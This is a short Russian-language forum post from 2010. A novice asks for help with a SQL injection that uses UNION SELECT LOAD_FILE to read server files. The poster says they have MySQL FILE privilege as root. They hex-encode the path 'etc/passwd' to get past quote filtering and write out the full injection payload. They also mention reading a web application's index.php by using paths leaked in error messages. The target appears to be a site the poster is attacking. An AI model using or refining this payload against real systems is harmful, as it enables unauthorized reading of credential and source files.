
26.05.2010, 11:41
|
|
Новичок
Регистрация: 03.07.2009
Сообщений: 11
Провел на форуме: 51296
Репутация:
0
|
|
не могу считывать файлы, подскажите
права вроде есть
root'@'localhost' | FILE | YES
USER() - возвращает что я под root@localhost
VERSION() - 5.0.51a-3ubuntu5.5
кавычки фильтруются по этому кодирую
к примеру
etc/passwd >>> 0x6574632f706173737764
делаю такую вот инъекцию
... where 1=2 union select LOAD_FILE(0x6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
но в результате приходит пустая строка.
файл пытаюсь открыть по пути который мне возвращается в ошибке, типа:
/usr/local/nginx/....../index.php
что я делаю не так?
|
|
|